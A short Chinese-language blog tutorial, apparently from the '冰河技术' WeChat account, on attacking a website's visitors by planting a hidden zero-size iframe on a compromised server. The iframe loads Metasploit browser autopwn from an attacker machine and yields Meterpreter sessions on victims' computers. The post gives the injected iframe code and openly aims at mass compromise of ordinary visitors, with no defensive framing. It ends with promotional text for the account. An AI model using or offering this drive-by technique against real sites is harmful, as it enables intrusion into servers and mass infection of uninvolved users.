对网站的客户进行渗透

本次的渗透主要是找到有漏洞的网站，在有漏洞的网站中嵌入隐藏的iFrame，那么访问这个网站的所有系统都会遭受来自browser autopwn服务器的攻击。我们可以利用iFrame注入实现对网站用户的大规模入侵。

攻击网站的用户

具体实施

首先，我们要获取一个存在漏洞的服务器的控制权限，这一点非常重要

接着，我们在网站的某个页面中，嵌入类似如下的代码：

<iframe src="http://192.168.175.128" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

每当有受害者访问网站时，上面的代码就会自动加载iFrame中的恶意browser autopwn。由于这段代码包含了一个iframe标签，它将会从攻击者系统中自动加载browser autopwn。我们需要保存这个文件，并允许用户对网站的访问。

受害者一旦访问了这个网页，browser autopwn将会自动在受害者的计算机上运行。我们必须确保browser autopwn模块正常运行

如果一切顺利，我们将会获得在目标系统中运行的Meterpreter。这种渗透思路是使用目标网站引诱最大数量的受害者，并进入到他们的系统中。

写在最后

如果你觉得冰河写的还不错，请微信搜索并关注「 冰河技术 」微信公众号，跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术，「 冰河技术 」微信公众号更新了大量技术专题，每一篇技术文章干货满满！不少读者已经通过阅读「 冰河技术 」微信公众号文章，吊打面试官，成功跳槽到大厂；也有不少读者实现了技术上的飞跃，成为公司的技术骨干！如果你也想像他们一样提升自己的能力，实现技术能力的飞跃，进大厂，升职加薪，那就关注「 冰河技术 」微信公众号吧，每天更新超硬核技术干货，让你对如何提升技术能力不再迷茫！